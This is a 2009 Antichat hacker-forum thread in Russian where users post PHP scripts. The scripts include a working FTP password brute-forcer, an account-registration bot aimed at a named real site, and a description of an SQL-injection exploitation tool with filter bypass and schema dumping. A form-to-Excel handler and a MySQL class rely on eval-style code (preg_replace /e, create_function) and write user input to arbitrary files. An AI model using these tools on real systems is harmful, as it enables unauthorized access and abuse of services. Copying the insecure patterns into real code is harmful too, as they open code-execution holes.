Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.01.2009, 00:23
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 37
Провел на форуме:
62317
Репутация:
6
|
|
Сообщение от D Mak
смысл торент.ру брутить?
там итак нахаляву качать можно..
Рейтинг =)
|
|
|
12.01.2009, 02:13
|
|
Новичок
Регистрация: 15.07.2008
Сообщений: 10
Провел на форуме:
31746
Репутация:
9
|
|
[php] Авторегер
Постучал MazaFaker и попросил авторегер для одного сайта.
Сделал я авторегер через сокеты...
Давайте разберём скрипт.
PHP код:
<?php
//config//
error_reporting(0); //Что бы не показывало какие нить ошибки
set_time_limit(0); // Убераем ограничение на выполнение скрипта, по дефолту 30сек
$a = 0; //Для счетчика понадобится переменная
$go = $_GET['go']; //Гет парраметр , тоже для счетчика
while($a != $go){ //Вот и сам цикл, для создания n кол-ва акков
$r1 = rand(100,50000); //создаем любое число от 100 до 50000
$login = "capcha".$r1; // делаем наш логин
$pass = "mazafaker"; // делаем наш пасс
$mail = "capcha".$r1."%40mail.ru"; // делаем рандомное мыло
// %40 это кодированый символ @, в HTTP запросах обязательно писать %40
$fp = fsockopen("www.online-777.ru", 80, $errno, $errstr, 30); //Открываем сокет(Коннектимся к сайту)
if (!$fp) { //Если не приконектилось
echo "$errstr ($errno)<br />\n"; // выводим причину
} else { //иначе
$headers1 = "r_login=".$login."&r_pass=".$pass."&r_email=".$mail."&r_name=&r_fam=&send=1&submit=%D1%EE%F5%F0%E0%ED%E8%F2%FC"; // Выполняем запрос такого вот вида, но о заголовках по позже
$headers = "POST http://www.online-777.ru/reg.php HTTP/1.1\r\n";
$headers .= "Host: www.online-777.ru\r\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4\r\n";
$headers .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$headers .= "Accept-Language: ru,en-us;q=0.7,en;q=0.3\r\n";
$headers .= "Accept-Encoding: gzip,deflate\r\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\r\n";
$headers .= "Connection: keep-alive\r\n";
$headers .= "Referer: http://www.online-777.ru/reg.php\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($headers1)."\r\n\r\n".$headers1; //вычисляем длину переменной $headers1
fwrite($fp, $headers); //выполняем заголовок в сокете
echo $login.":".$pass."<br>"; //выводим наш пасс и логин
fclose($fp); //закрываем сокет
}
$a++; //плюсуем $a
}
?>
Теперь поговорим про сами заголовки.
Как получить заголовок?
Я пользуюсь плагином для FireFox , называется liveHttpHeaders
качаем тут
устанавливаем плагин.
Заходим в Инструменты->Дополнения и открываем наш плагин.
Заходим на сайт где нужен нам авторегер и регимся сначало вручную,теперь смотрим что появилось в том окошке плагина, а получиться должно что-то типа этого
Код:
POST /reg.php HTTP/1.1
Host: www.online-777.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.online-777.ru/reg.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
r_login=LoGiN111&r_pass=PaZzZz111&r_email=Mail%40mail.ru&r_name=&r_fam=&send=1&submit=%D1%EE%F5%F0%E0%ED%E8%F2%FC
Код:
r_login=LoGiN111&r_pass=PaZzZz111&r_email=Mail%40mail.ru&r_name=&r_fam=&send=1&submit=%D1%EE%F5%F0%E0%ED%E8%F2%FC[
Вот сама строчка пост запроса.
r_login=LoGiN111
r_pass=PaZzZz111
r_email=Mail%40mail.ru
Нам надо эту строчку приобразовать в
PHP код:
$headers1 = "r_login=".$login."&r_pass=".$pass."&r_email=".$mail."&r_name=&r_fam=&send=1&submit=%D1%EE%F5%F0%E0%ED%E8%F2%FC";
А все остальные пстроки мы вписываем в переменную $headers, но в конце каждой строчки добавляем \r\n.
Последнюю строчку запроса , тобиш вот эту
мы преобразуем в
PHP код:
$headers .= "Content-Length: ".strlen($headers1)."\r\n\r\n".$headers1;
Тобиш мы автоматически вычесляем длинну нашего пост запроса и сразу же его выполняем.
Ну вроде бы и всё..
Думаю вам ещё не совсем понятно, т.к. это не совсем джля новичков написано, хотя кто его знает.
Всегда Ваш Капча)) |
|
|
|
12.01.2009, 02:16
|
|
Новичок
Регистрация: 15.07.2008
Сообщений: 10
Провел на форуме:
31746
Репутация:
9
|
|
[php] ftp Брут
Вдруг понадобился брут фтп сервера.
Решил показать вам код и прокомментировать его.
PHP код:
<?php
//@Coder - Capcha
//@PHP ftp Brute v.1.0 ;)
//Config//
$host = $_GET['host']; //Передаём переменной $host IP адресс нашего фтп, через GET запрос
$passwords = "pass.txt"; //Файл с паролями
$user = $_GET['user']; //Передаём переменной $user логин от сервера
//------//
//Script//
if(isset($host)){ //Если существует переменная $host, т.е. если она не равна NULL, то
$pass = file($passwords); //каждую строку файла заганяем в каждую клетку массива переменной $pass
foreach($pass as $line){ //переменной $line придаётся значение каждой клетки массива
@$conn = ftp_connect($host);
if(!@$conn){ //Если не удалось приконнектится, то
die("<font color=orange>Connection Error</font>"); //заканчиваем работу скрипта
} else { //Иначе, если получилось приконнектиться, то
$line = trim($line); //отчищаем переменную $line от пробелов и от \n
echo $line." - "; //выводим пароль на екран
@$login = ftp_login($conn,$user,$line);
if(!@$login){ //Если не удаётся зайти на сервак под этим пассом и логином, то
echo "<font color=red>Access Denied</font><br>"; //выводим-с это и
@ftp_close($conn);//закрываем соединение
} else { //Иначе если удалось залогиниться, то
echo "<font color=green>Access Grunted</font><br>";//выводим вот это
@ftp_close($conn); //Закрываем соединение
}
}
}
}
?>
Как использывать скрипт?
Собственно и всё, задавайте свои вопросы, если таковые имеются. |
|
|
|
[Video php] Регистрация на файлах |
12.01.2009, 02:20
|
|
Новичок
Регистрация: 15.07.2008
Сообщений: 10
Провел на форуме:
31746
Репутация:
9
|
|
[Video php] Регистрация на файлах
Самое простое что нужно усвоить новичкам.
Продолжительность 5минут
Размер 45мб
.:: Deposit::. |
|
|
|
12.01.2009, 23:41
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Еще один раскрутчик SQl иньекций. Здесь пытался реализовать все что знаю. Чесно говоря даже не знаю зачем.
Что умеет?
- Да собственно скрипт проверяет переданный ему линк на скуль иньекты. Как? Очень просто скрипт использует BENCHMARK для того чтобы определить наличие SQL иньекта.
- Умеет обходить фильтрацию кавычек, пробелов, пары ключевых слов, чего там еще... да собственно вроде все.
- После того как скуль иньект обнаружен скрипт определяет количество полей, выводимое поле, и если версия мускуля пятая выводит дамп information_schema.
Вкратце это все... Конечно супер извращенную скулю он не раскрутит, но по идее должен хотябы показать ее наличие.
Собственно вот ниже скрипт. Юзаем как есть, то есть поддержку этого я не осуществляю. Юзаем так:
script.php?link=http://test.ru/news.php?id=1
* в архиве лежит пофиксенная версия.
И еще нашли ошибки - исправляйте их сами, мне этот скрипт до одного места, откровенно говоря.
__________________
Кто я?..
Последний раз редактировалось Dr.Z3r0; 27.01.2009 в 18:50..
|
|
|
|
16.01.2009, 14:52
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
FTP2FTP
Напрямую, минуя ваш компьютер.
Скрипт необязательно устанавливать туда, куда скачиваешь. На любой сайт с поддержкой php, чтобы было понятно:
1. Сайт, откуда скачиваешь
2. FTP (сайт), куда скачиваешь
3. Сайт, где установлен скрипт ( может не иметь никакого отношения к п.2 и может вообще быть не сайтом )
PHP код:
<pre>
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
if(isset($submit))
{
$file = trim($_POST['d_file']); //Удаленный путь к файлу
$remote_file = trim($_POST['r_file']); //Локальный путь к файлу (абсолютный)
$ftp_server = trim($_POST['server']);
$ftp_user = trim($_POST['login']);
$ftp_pass = trim($_POST['pass']);
// установить соединение или выйти
$conn_id = ftp_connect($ftp_server) or die("Не удалось установить соединение с $ftp_server");
// попытка входа
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo "Произведен вход на $ftp_server под именем $ftp_user\n";
} else {
echo "Не удалось войти под именем $ftp_user\n";
}
// загрузка файла
if (ftp_put($conn_id, $remote_file, $file, FTP_BINARY)) {
echo "$file загружен на сервер\n";
} else {
echo "Не удалось загрузить $file на сервер\n";
}
// close the connection and the file handler
ftp_close($conn_id);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text; charset=windows-1251">
<title>FTP2FTP</title>
</head>
<bоdу>
<div align="center">
<form method="post">
<table>
<tr><td><span>Файл для скачивания(http://.../имя_файла)</span></td><td><input type="text" name="d_file" /></td></tr>
<tr><td><span>Путь для скачивания на фтп(абсолютный -/http/1/имя_файла)</span></td><td><input type="text" name="r_file" /></td>
<tr><td><span>FTP-сервер:</span></td><td><input type="text" name="server" /></td></tr>
<tr><td><span>FTP-login:</span></td><td><input type="text" name="login" /></td></tr>
<tr><td><span>FTP-password:</span></td><td><input type="password" name="pass" /></td></tr>
</table>
<input type="submit" name="submit" value="Start" />
</form>
</div>
</bоdу>
</html>
</pre>
Последний раз редактировалось Pashkela; 16.01.2009 в 15:43..
|
|
|
|
17.01.2009, 01:17
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
Сообщение от Dr.Z3r0
Еще один раскрутчик SQl иньекций. Здесь пытался реализовать все что знаю. Чесно говоря даже не знаю зачем.
Что умеет?
- Да собственно скрипт проверяет переданный ему линк на скуль иньекты. Как? Очень просто скрипт использует BENCHMARK для того чтобы определить наличие SQL иньекта.
- Умеет обходить фильтрацию кавычек, пробелов, пары ключевых слов, чего там еще... да собственно вроде все.
- После того как скуль иньект обнаружен скрипт определяет количество полей, выводимое поле, и если версия мускуля пятая выводит дамп information_schema.
Вкратце это все... Конечно супер извращенную скулю он не раскрутит, но по идее должен хотябы показать ее наличие.
Собственно вот ниже скрипт. Юзаем как есть, то есть поддержку этого я не осуществляю. Юзаем так:
script.php?link=http://test.ru/news.php?id=1
Перепробовал много простых инъекций. Всегда определяет количество столбцов равное 6 и дальше работа скрипта загибается. Нашел в запасах скулю с 6 столбцами- работает превосходно. В чем может быть проблема?
|
|
|
|
18.01.2009, 04:49
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Site scaner
Простой сканер сайтов, который поможет выявить наличие на сайте той или иной папки или файла, что иногда может быть очень полезно при определенных обстоятельствах. Есть возможность пополнять словарь для брута и файл ошибок, возвращенных браузером, когда папка или файл не найдены. Т.е. настраивается практически на любой сайт. Readme в архиве. Найденные результаты запишет в файл.
Скачать
Последний раз редактировалось Pashkela; 19.01.2009 в 18:42..
|
|
|
|
21.01.2009, 16:33
|
|
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999
Репутация:
444
|
|
PHP Скрипт , который обрабатывает формы и сохраняет непосредственно в файл Excel.
PHP код:
<html>
<head><title>
<?php
//Code by apg88 "apgForm(toExcel) 1.4"
// Determine if the form was sent through the GET methog or the POST method.
if($_GET){
$array = $_GET;
}else if($_POST){
$array = $_POST;
} else {
echo "You must Access this file through a form."; // If someone accesses the file directly, it wont work :)
}
if(!$array['title']){
// if the title wasnt sent through the form, it will become whatever you set it equal to in the next line
$array['title'] = "apgForm"; //Set default title to be displayed
}
echo $array['title'] .'</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>';
//Check if the filename was sent through the form or not
if(!$array['filename']){
// if the filename wasnt sent through the form, it will become form.xls, you can change the default if you want.
$array['filename'] = "form.xls"; //Set the file to save the information in
} else {
if(!(stristr($array['filename'],".xls"))){
$array['filename'] = $array['filename'] . ".xls";
}
}
// Change this to whatever you want the users to see after the form is processed
$continue = ' Here is a the Comment form your info was just sent to <a href="test.xls">Click
Here</a> to see the excel file.<br> <a href = "index.php">Click Here</a> To Return to apgForm ';
// Change this to the character(s) you want to be placed instead of line breaks(new line, enter, etc)
$lbChar = " "; // default is a space, you may change it to whatever you want
//-------------------------------------------------------------------------------------
//----------------You do not need to change anything below this line-------------------
//-------------------------------------------------------------------------------------
// Define the tab and carriage return characters:
$tab = "\t"; //chr(9);
$cr = "\n"; //chr(13);
if($array){
// Make The Top row for the excel file and store it in the $header variable
$keys = array_keys($array);
foreach($keys as $key){
if(strtolower($key) != 'filename' && strtolower($key) != 'title'){
$header .= $key . $tab;
}
}
$header .= $cr;
//Make the line with the contents to write to the excel file.
foreach($keys as $key){
if(strtolower($key) != 'filename' && strtolower($key) != 'title'){
$array[$key] = str_replace("\n",$lbChar,$array[$key]);
$array[$key] = preg_replace('/([\r\n])/e',"ord('$1')==10?'':''",$array[$key]);
$array[$key] = str_replace("\\","",$array[$key]);
$array[$key] = str_replace($tab, " ", $array[$key]);
$data .= $array[$key] . $tab ;
}
}
$data .= $cr;
if (file_exists($array['filename'])) {
$final_data = $data; //if the file does exist, then only write the information the user sent
} else {
$final_data = $header . $data; //if file does not exist, write the header(first line in excel with titles) to the file
}
// open the file and write to it
$fp = fopen($array['filename'],"a"); // $fp is now the file pointer to file $array['filename']
if($fp){
fwrite($fp,$final_data); //Write information to the file
fclose($fp); // Close the file
echo "Form Received Successfully! <br> " . $continue;
} else {
echo "Error receiving form! <br>" . $continue;
}
}
?>
</body>
</html>
|
|
|
|
23.01.2009, 18:55
|
|
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897
Репутация:
267
|
|
Вообщем думаю что написал полный бред,так как писал не совсем в трезвом состоянии)
Ещё один класс для работы с мускулем.
PHP код:
<?php
/* Есчё один классок для базы данных MySQL
*
* Скрип писался не совсем в трезвом состоянии)
*
* [p1r47] aka Shadow_p1raT
*
* icq:9930875
*/
class My_SQL
{
var $user_name;
var $password;
var $db_host;
var $db_name;
var $des; # Дескриптор подключения
/*
* Конструктор класса
* @param string $username - Логин пользователя
* @param string $password - Пароль пользрвателя
* @param string $dbname - Имя базы
* @param string $dbhost - Хост. по дефолту = localhost
*/
function __construct($username,$password,$dbname,$dbhost = 'localhost')
{
$this->db_host = $dbhost;
$this->db_name = $dbname;
$this->user_name = $username;
$this->password = $password;
}
/*
* Функция соединения с базой данных
*
*/
function connect()
{
$this->des = mysql_pconnect($this->db_host,$this->user_name,$this->password);
if(!is_resource($this->des))
{
die('Невозможно подключиться к базе Данных');
}
if(!mysql_select_db($this->db_name,$this->des))
{
die('Невозможно выбрать базу данных');
}
}
/*
* Выполняем запрос к базе данных
* @param string $query - Строка запроса
* @param string $function - Функция обработки данных после вполнения запроса
* @return void
*/
function execute($query,$function = '')
{
if(!$this->des)
{
$this->connect();
}
$res = mysql_query($query,$this->des);
if(!is_resource($res))
{
die('Неудалось выполнить запрос к базе данных');
}
if(!$function == '')
{
if($func = call_user_func(create_function('$res','return '. $function),$res))
{
return $func;
}
}
return($res);
}
}
Пример использывания
PHP код:
<?php
$db = new My_SQL('root','','roa');
$db->connect();
print_r($db->execute('SELECT * FROM `users`','mysql_fetch_array($res);'));
?>
ЗЫ если такое уже есть или я ваще сумашедший - delete post
ЗЫЫ Ой,cлучайно спалил секретную таблицу РОА
Последний раз редактировалось Shadow_p1raT; 23.01.2009 в 19:20..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
